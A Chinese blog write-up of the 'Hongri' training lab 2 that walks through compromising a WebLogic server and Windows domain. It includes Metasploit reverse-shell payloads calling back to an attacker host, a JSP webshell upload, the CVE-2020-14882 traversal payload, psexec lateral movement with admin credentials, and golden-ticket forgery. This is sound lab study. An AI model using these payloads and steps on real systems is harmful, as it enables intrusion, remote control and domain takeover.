1. Toy模板网首页
  2. > Toy博客

红日靶场2

9月前 作者:誓下 分类:Toy博客 阅读(27) 违法举报

这篇具有很好参考价值的文章主要介绍了红日靶场2。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

红日2

打靶前准备

1、初始密码为1qaz@WSX,注意WEB这台机器,需要切换用户为de1ay,密码为1qaz@WSX登入

2、修改网卡,如PC 、WEB 拥有俩个网卡,则网卡一设置为nat,也可以是主机模式,但由于学校校园网认证方面的问题,主机模式无法上网,所以我用nat模式。对应的把nat模式的网段修改为192.168.111.0

红日靶场2

设置一个lan区段,所有主机都加入到这个lan区段

结果如下:

红日靶场2

3、然后利用kail或者windows10作为攻击机。为了方便,可以用三台。包括虚拟机kail,虚拟机windows10以及本机。主要是一些软件不敢放在主机上

他们之间的连接关系如下:##用ensp,主机只有一个接口,截图又没有直线,我真是醉了

红日靶场2

注意:这里内外网只是相对于这些虚拟主机的。

主机 外网ip 内网ip
PC.de1ay.com 192.168.111.201 10.10.10.201
WEB.de1ay.com 192.168.111.80 10.10.10.80
DC.de1ay.com 10.10.10.10
攻击机若干 192.168.111.0网段就行

4、打开web主机,进入C:\Oracle\Middleware\user_projects\domains\base_domain\bin右击以管理员身份

运行startWeblogic。需要管理员身份:administrator/1qaz@WSX

最后web以及pc 通过管理员的方法打开服务。确保Server、Workstation、Computer Browser服务能够启动

开始工作:

1、信息收集:

1)主机信息收集

启动kail的nmap

nmap -sV 192.168.111.0/24 //显示系统以及程序版本信息

红日靶场2

红日靶场2

访问.80的ip #默认是访问80端口,啥都没有

红日靶场2

启动目录扫描

御剑:

红日靶场2

kail的dirsearch:

红日靶场2

上面出现的目录全都是啥都没有·················目前来说还是没有发现有用的信息。

2)扫描web的7001端口

御剑:扫了个寂寞,应该我是字典不够大

dirsearch:

红日靶场2

3)主机漏洞扫描

web主机漏洞扫描

可能存在的漏洞

端口 漏洞 描述
1433 CVE-2014-3566
3389 ms12-020.CVE-2012-0152
ms17-010、cve-2012-1182、ms10-061

pc主机漏洞扫描,情况同上

2、从web的7001端口入手

1)利用weblogicscan对网页进行扫描,本次用的版本低了

红日靶场2

优点:开源,容易安装(前提需要python环境),操作简单,能够发现CVE通用漏洞

缺点:界面不好(版本高点可能会更好),第一次用崩了。局限性:针对weblogicScan框架

2)利用AWVS:

红日靶场2

优点:效率还挺高,因为是自己搭建的靶场,所以线程开了最大。漏洞的大部分基本上都有了

缺点:难装。也是失败了好几次才能装成功。貌似没有通用漏洞

GitHub - 0xn0ne/weblogicScanner: weblogic 漏洞扫描工具。目前包含对以下漏洞的检测能力:CVE-2014-4210、CVE-2016-0638、CVE-2016-3510、CVE-2017-3248、CVE-2017-3506、CVE-2017-10271、CVE-2018-2628、CVE-2018-2893、CVE-2018-2894、CVE-2018-3191、CVE-2018-3245、CVE-2018-3252、CVE-2019-2618、CVE-2019-2725、CVE-2019-2729、CVE-2019-2890、CVE-2020-2551、CVE-2020-14882、CVE-2020-14883

!!!实战需要授权,允许使用工具才能用!!!

工具名称 web:top10 通用
AWVS 如上图 貌似没有发现
weblogicScan SSRF CVE-2019-2725、CVE-2017-3506、CVE-2018-2893
weblogicScanner CVE-2020-14882、CVE-2020-2883、CVE-2017-3506、CVE-2017-10271、CVE-2019-2725

weblogicScanner、weblogicScan都是针对weblogic服务的

尝试找到突破点之利用CVE-2019-2725打带域控

对CVE-2019-2725进行利用:

方法一,通过改包的方式执行命令,技术不足暂不实现

方法二,简单粗暴,kail!

kail启动msfconsole

serch cve-2019-2725   #查找这个漏洞对应的模块
​
use 0            #只有一个模块,也只能用它了
​
show options      #查找需要填写的参数
​
set payload windows/meterpreter/reverse_tcp  #设置攻击载荷,因为已经对方为windows系统
​
set lhost 本机ip 
​
set rhost 靶机ip
​
show targets  #查看设置的攻击目标系统,1为windows,主要是为了增加成功率
​
set target 1
​
run     #可能会失败,多run几次
tip:shell之后有乱码,可以chcp 65001

红日靶场2

arp -a 获取到了还有个10.10.10.10的主机

meterpreter之信息收集
route/arp -a 收集网络相关信息
sysinfo 收集主机系统配置
shell 进入shell主机

回首掏

忘记看看能不能提权了,居然成了~

红日靶场2

3、连接CS

kail启动服务端

红日靶场2

CS连接进入

创建一个监听

红日靶场2

然后background退出来,会有一个session,exit退出来不会有session

background
​
use exploit/windows/local/payload_inject
​
set payload windows/meterpreter/reverse_http
​
set DisablePayloadHandler true
​
set lhost 192.168.111.123
​
set lport 6688
​
run

CS上线

红日靶场2

4、内网信息收集

CS

  elevate svc-exe test #提权 看图一
  shell  ipconfig\all  #图二
  shell net user \domain # 查看域信息

红日靶场2

图 一

红日靶场2

图 二

红日靶场2

红日靶场2

获取密码:得出密码为1qaz@WSX

红日靶场2

5、通过CS拿下域控

创一个smb类型的监听

红日靶场2

rev2self
​
make_token de1ay.com\administrator 1qaz@WSX
​
jump psexec DC smb

域控就拿下来了

红日靶场2

小总结,通过cs操作明显比msf更加简单。

CVE-2017-3506

访问ip:7001/wls-wsat/CoordinatorPortType11 weblogic默认为7001端口,具体端口视情况而定。如果出现下图,则说明存在该漏洞

红日靶场2

下载工具:https://github.com/Al1ex/CVE-2017-3506

再验证一波: ###还是不要偷懒···少打了http://就监测不了了

红日靶场2

通过 java -jar WebLogic-XMLDecoder.jar -s http://192.168.111.80:7001 /wls-wsat/CoordinatorPortType11 shell.jsp 上传后门

访问: http://192.168.111.80:7001/wls-wsat/shell.jsp?password=secfree&command=whoami

红日靶场2

漏洞修复 :

待补充

CVE-2019-2618

工具下载地址:https://github.com/jas502n/cve-2019-2618

python2 cve-2019-2618.py http://192.168.111.80:7001 weblogic 1qaz@WSX

红日靶场2

访问提升的shell.jsp

红日靶场2

目前还不会通过命令行写入后门,而且还需要知道该机web服务的根目录才能使后门木马被我们所连接

CVE-2020-14882

未授权访问。可以直接访问后台。并执行命令

payload:

/console/images/%252E%252E%252Fconsole.portal

其中%252e%252e%252f是经过url的二次编码,其含义为../

红日靶场2

代码分析参考:CVE-2020-14882:Weblogic Console 权限绕过深入解析 - 360CERT

最后伪造TGT :黄金票据

根据收集的信息

在域控上:执行黄票票据

红日靶场2

红日靶场2

红日靶场2

用户名可以随意,其他的按收集的信息填写。#因为黄金票据不需要经过AS(认证服务)了,也就无需登录。因为kerberos系统的安全基于AS和TGS的绝对信任,所以TGS不会再次对用户信息进行验证。

红日靶场2

成功:

红日靶场2

总结:

虽然利用AWVS扫描出来了几个风险漏洞,但并不容易利用,虽然暂时不去实现。另外利用nmap扫描出来的其余漏洞也暂时不去实现。因为都是利用msf去跑就行了。具体就是

msfconsole

search 漏洞的编号 ##查看msf是否有该漏洞的攻击方法

use x #选择想要的攻击模块

show options #查看需要填写的参数

show targets #查看是否需要更改对面系统信息

set ····· #设置对应的参数

run #

目前就复现以上的漏洞,还有很多的操作没有实现,日后学成再尝试打打。最遗憾的就是没有能够留下后门,主要原因是未能懂得如何在get到webshell的情况下写入一个木马。

未完待续······················文章来源地址https://www.toymoban.com/news/detail-415611.html

到了这里,关于红日靶场2的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • 红日内网渗透靶场2

    红日内网渗透靶场2

    目录   环境搭建: Web渗透: weblogic漏洞利用 java反序列化漏洞利用、哥斯拉获取shell 上线msf msf派生shell到cs 内网信息收集 mimikatz获取用户密码 cs横向移动 PTT攻击(票据传递) 方法2:通过msf利用永恒之蓝以及3389端口 上线cs cs派生shell给msf fscan扫描内网 frp搭建socks5隧道代理 永

    2024年01月21日
    浏览(52)
  • vulnstack1 红日靶场渗透详解

    vulnstack1 红日靶场渗透详解

    目录 环境搭建 信息收集 PhpMyAdmin 后台 Getshell into outfile Mysql日志文件写入shell CS后渗透 MSF后渗透 知识补充 nmap 参数分类 参数速查表 dirsearch ip段设置 kali可以访问win7,但不能直接访问win08和win2k3 开启win7 web/mysql服务 端口扫描 80/tcp open http 3306/tcp open mysql web目录扫描 爆破登录

    2024年02月12日
    浏览(38)
  • 红日靶场2 ATT&&CK攻击

    红日靶场2 ATT&&CK攻击

    360免杀其实没有你想象的那么难 首先最重要的是 你要用免杀脚本对你所生成的木马病毒进行加密 然后加密系统的内核,就是上一篇文章所提及的 是通过两次加密之后 所输出的结果,让360无法感知到,然后先通过java反序列化工具将冰蝎工具的JSP后门代码上传上去,这个不会

    2024年01月18日
    浏览(41)
  • 红日ATT&CK系列靶场(-)简记

    红日ATT&CK系列靶场(-)简记

    Step 1》信息收集 nmap 发现80、 3306 nmap -T4 -O 192.168.92.100 访问80端口 dirsearch(御剑)扫描 发现:/phpMyadmin Step 2 》漏洞利用 1.弱口令 http://192.168.92.100/phpMyadmin root/root 登录成功 2.getshell select @@basedir //查绝对路径 into outfile 写马 select \\\'?php eval($_POST[cmd]);?\\\' into outfile \\\'C://绝对路径/shell.

    2024年02月09日
    浏览(43)
  • 红日靶场2 指免杀360 个人学习记录

    红日靶场2 指免杀360 个人学习记录

    360安全卫士,有一说一,确实很强,这几天研究的MSF利用java反序列化的漏洞是无法利用的,其他方法也瘦小甚微 前几天在研究用 用免杀工具 go-shellcode-loader-main免杀工具对我们生成的木马进行加密 本来是用csa4.0黑客工具生成了一个jsp的恶意代码 我首先要承认,微软自带的病

    2024年01月16日
    浏览(39)

  • mysql8初始密码及root密码修改

     安装mysql8之后没有办法登录,初始密码是多少? 获取初始密码输入以下命令mysqld --initialize --console mysqld --initialize --console 执行完成后,会输出 root 用户的初始默认密码 APWCY5wshjQ 就是初始密码 如果刚开始没有记住这个密码,那就删除mysql目录下的data文件夹重新进行初始化,

    2024年02月11日
    浏览(49)
  • 查看MySQL初始密码并修改

    查看MySQL初始密码并修改

    1.安装时的初始密码查看: 当安装mysql的服务: mysqld --install 初始化mysql,在这里,初始化会产生一个随机密码,如下图框框所示,记住这个密码,后面会用到(mysqld --initialize --console) 2.若没注意初始密码,可以通过查看安装目录中的文件来找回密码: 找到data文件夹下面的XXX.

    2024年02月07日
    浏览(78)

  • linux mysql查看初始密码

    介绍Linux MySQL初始密码 在Linux系统中,MySQL是一种常见的数据管理系统。在安装MySQL时,需要设置初始密码。初始密码是一个在安装时生成的随机密码,用于保护MySQL数据库的安全。 查看MySQL初始密码的方法 查看MySQL初始密码有两种方法:通过日志文件或使用mysql_config_editor 工具

    2024年02月04日
    浏览(43)

  • MySQL安装及初始密码设置

    运行mysql --help | grep my.cnf查看my.cnf配置位置的读取顺序。/etc/my.cnf不存在,则我们需要在etc下创建my.cnf配置文件(mysql会优先度读取)。 ==================================== 下载MySQL包 安装MySQL源 安装MySQL 原因是Mysql的GPG升级了,需要重新获取 使用以下命令即可 然后要启动MySQL,要设置初

    2024年02月05日
    浏览(36)
  • Kibana忘记初始密码怎么办?

    Kibana忘记初始密码怎么办?

    在你elasticsearch的安装目录bin目录下面执行 执行结束之后就是下面初始化新的密码 注意 :首次登录Kibana的登录名:elastic 密码:就是第一次执行elasticsearch.bat 那个文件之后产生的(我是记不得了)还是初始化一次 就是上面图片初始化以后的密码。

    2024年02月12日
    浏览(45)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包